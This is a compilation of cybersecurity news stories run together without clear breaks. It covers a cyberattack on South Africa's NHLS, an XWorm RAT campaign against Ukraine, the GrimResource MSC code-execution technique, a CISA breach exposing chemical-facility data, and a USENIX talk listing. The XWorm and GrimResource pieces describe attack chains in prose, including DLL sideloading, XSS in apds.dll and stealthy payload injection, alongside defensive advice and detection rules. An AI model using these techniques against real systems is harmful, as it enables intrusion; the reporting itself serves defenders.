NHLS Chief Executive Officer Prof Koleka Mlisana informed staff of the incident in a memo, stating that the breach had caused damage and that the organization was treating the matter with extreme urgency and concern. Milsana stated, “I regret to inform you that our IT systems are unavailable due to a suspected incident that occurred over the weekend.” Mlisana assured staff that the organization's Incident Response Team was working around the clock to determine the scope of the intrusion and deploy the necessary safeguards to secure systems and data. The NHLS has implemented its "Downtime Protocol" to minimize disruption to services, prioritizing patients' samples and processing, with results communicated directly to clinicians whenever urgent. The cyber attack comes at a critical time for South Africa's healthcare system. The country is currently grappling with a Mpox outbreak, and the NHLS was already facing a significant backlog in toxicology tests as of March. The shutdown of IT systems is likely to exacerbate these challenges. Mzi Gcukumana, the NHLS Communication, Marketing, and PR officer, disclosed: “Preliminary investigation suggests that our Enterprise Resource Planning (Oracle) environment, Laboratory Information System (LIS) (TrakCare) database, and CDW are not affected. Therefore, no patient data has been lost or compromised. All patient data is safe."Response and Recovery Efforts
“Please rest assured that our priority focus is on data security. We are determined to solve this issue swiftly and transparently,” Milsana stated to patients. In response to the breach, the NHLS has deployed its Incident Response Team to assess the scope of the intrusion and implement necessary safeguards. Mlisana assured staff that the team is working around the clock to secure systems and data. “I want to take this opportunity to thank you in advance as we all put in our efforts to ensure that disruption to our services is minimised,” Milsana added. The NHLS had determined that that certain sections of its systems, including its backup server were deleted, requiring the rebuilding of affected systems. Gcukumana stated, “All users will be aware that the NHLS networked laboratory system is heavily reliant on these information technology systems that have been disrupted.” He added, “Unfortunately, this will take time, and investigations thus far have not advanced enough for us to give a timeframe for the restoration of our systems and full service. All stakeholders and the public will be informed as soon as more information becomes available.” The National Department of Health, which oversees the NHLS, has been informed of the incident. A spokesperson for the department called for patience as efforts to resolve the issue continue. As the investigation unfolds, the NHLS has promised regular updates on the compromise and ongoing response activities. The organization emphasizes its commitment to data security and swift, transparent resolution of the issue. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Russian Hackers Target Ukraine with XWorm RAT Malware Payload
Technical Overview of XWorm RAT Campaign
The campaign begins with a malicious LNK shortcut file, disguised as a legitimate Excel document, which executes a PowerShell script upon execution. The script downloads two files, "pkg.zip" and "NewCopy.xlsx", from a specified URL. The LNK shortcut file then executes "pythonw.exe" using the start command, which duplicates files and stores them in a new folder. The "pythonw.exe" loads a malicious DLL, "python310.dll", through DLL sideloading, injecting shellcode into the MSBuild process. [caption id="attachment_78917" align="alignnone" width="1529"]![Russia Ukraine XWorm Malware](../themes/icons/grey.gif)
![XWorm Malware Excel](../themes/icons/grey.gif)
Protecting Against XWorm RAT
The XWorm RAT malware employed in the campaign is designed to be easily accessible even to to threat actors lacking sophistication and technical expertise. The versatile malware offers several functionalities, including data theft, DDoS attacks, cryptocurrency address manipulation, ransomware deployment, and downloading additional malware onto compromised systems. Cyble researchers have recommended several measures to defend against this campaign:- Implement strong email filtering to block malicious attachments.
- Exercise caution with email attachments, especially from unknown senders.
- Limit execution of scripting languages where possible.
- Use application whitelisting to control which programs can run.
- Deploy robust antivirus and anti-malware solutions.
- Enforce strong, unique passwords and two-factor authentication.
- Monitor networks for unusual activity or data exfiltration attempts.
GrimResource: New Microsoft Management Console Attack Found in Wild
GrimResource Attack Uses Old XSS Flaw
GrimResource is a “a novel, in-the-wild code execution technique leveraging specially crafted MSC files,” the researchers wrote. “GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (mmc.exe) with minimal security warnings, ideal for gaining initial access and evading defenses.” The key to the attack technique is an old XSS flaw present in the apds.dll library. “By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of mmc.exe,” they said. Attackers can combine the technique with DotNetToJScript to gain arbitrary code execution. The sample begins with a TransformNode obfuscation technique, which was recently reported by open source tool developer Philippe Lagadec in unrelated macro samples. The obfuscation technique helps evade ActiveX security warnings and leads to an obfuscated embedded VBScript, which sets the target payload in a series of environment variables before leveraging the DotNetToJs technique to execute an embedded .NET loader. The researchers named that component PASTALOADER. PASTALOADER retrieves the payload from environment variables set by the VBScript and “spawns a new instance of dllhost.exe and injects the payload into it. This is done in a deliberately stealthy manner using the DirtyCLR technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.” Using the DotNetToJScript technique triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine. The researchers created a rule in Elastic’s Event Query Language (EQL) to detect execution via the .NET loader.GrimResource Detection Rules Provided
Those detections can be bypassed with stealthier methods, the researchers noted: Using apds.dll to execute Jscript via XSS, which can create detectable artifacts in the mmc.exe Procmon output as a CreateFile operation (apds.dll is not loaded as a library), and the creation of a temporary HTML file in the INetCache folder, named redirect[*] as a result of the APDS XSS redirection. In addition to EQL rules, the researchers also provided a YARA detection rule: [caption id="attachment_78894" align="alignnone" width="500"]![GrimResource YARA detection rule](../themes/icons/grey.gif)
CISA: Hackers Breached Chemical Facilities’ Data in January
Potential Data Compromised in Chemical Facilities' Targeting
CISA's investigation found no direct evidence of data exfiltration but indicated that the hackers might have accessed critical information such as site security plans, security vulnerability assessments (SVAs), and user accounts within CSAT. Additionally, "Top-Screen surveys," which detail the types and quantities of chemicals, their properties, and storage methods at facilities, might have been exposed. High-risk chemical facilities are mandated to submit SVAs outlining their critical assets, cyber and physical security policies, and an analysis of potential vulnerabilities. Other compromised documents could include details on cybersecurity measures, alarms and physical barriers in place at these facilities.CISA's Response and Recommendations
CISA has informed participants in the Chemical Facility Anti-Terrorism Standards (CFATS) program about the potential data exposure. Although no credentials were confirmed to be stolen, CISA advises those with CSAT accounts reset any identical business or personal passwords. They also recommend organizations using Ivanti products review a February advisory about recent vulnerabilities. The agency cannot directly notify individuals submitted for terrorist vetting under the CFATS Personnel Surety Program because it did not collect their contact information. However, identity protection services will be offered to those affected, specifically those vetted between December 2015 and July 2023.Investigation Findings
The breach was detected on January 26, when CISA discovered hackers installing tools on an Ivanti device. Further investigation revealed multiple accesses to the system over two days. Various departments within CISA and the Department of Homeland Security (DHS) were involved in the investigation, which confirmed no hacker access beyond the initial Ivanti device. Despite the absence of evidence for data exfiltration, the potential risk to numerous individuals and organizations categorized this intrusion as a "major incident" under the Federal Information Security Modernization Act (FISMA). CISA is setting up a call center to assist impacted individuals, although it is not yet operational. The agency did not comment on the perpetrators of the attack, but since 2020, CISA has cautioned organizations about state-sponsored hackers, including those linked to China, exploiting vulnerabilities in Ivanti products.Experts Say More Transparency Required
Roger Grimes, a data-driven defense evangelist at KnowBe4, lauded CISA's intent and the fact that it publicly accepted the hack but said a bit more transparency would have done no harm.
"I'm a big fan of CISA. I think they do wonderful work. Still, it would be useful to have better, full transparency," Grimes told The Cyber Express. "Was their Ivanti device exploited by an unpatched, but known vulnerability, or exploited by a 0-day? If they were exploited by a known vulnerability where a patch was available, which is more likely, why wasn't the patch installed? Was it simply due to the fact that the exploit happened faster than the patch could be applied? Was the patch missed? If the patch was missed, why? Or was it a 0-day, misconfiguration, or credential compromise?"
"This is not to embarrass CISA, but to learn why one of the best, most aggressive patch-pushing, cyber-defending organizations in the world got compromised," Grimes added. "Sharing what happened and why can help other organizations facing similar problems and challenges learn lessons.
"CISA is always pushing for other industries and vendors to be more transparent about their compromises so that we can all learn from the lessons and mistakes. I expect CISA to do the same and even lead by example when it's their infrastructure involved."
Fresh MOVEit Bug Under Attack Mere Hours After Disclosure
Indonesia Refuses to Pay $8M Ransom After Cyberattack
-
Security Boulevard
- USENIX Security ’23 – Catch You and I Can: Revealing Source Voiceprint Against Voice Conversion
USENIX Security ’23 – Catch You and I Can: Revealing Source Voiceprint Against Voice Conversion
Authors/Presenters:Jiangyi Deng, Yanjiao Chen, Yinan Zhong, Qianhao Miao, Xueluan Gong, Wenyuan Xu
Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.
The post USENIX Security ’23 – Catch You and I Can: Revealing Source Voiceprint Against Voice Conversion appeared first on Security Boulevard.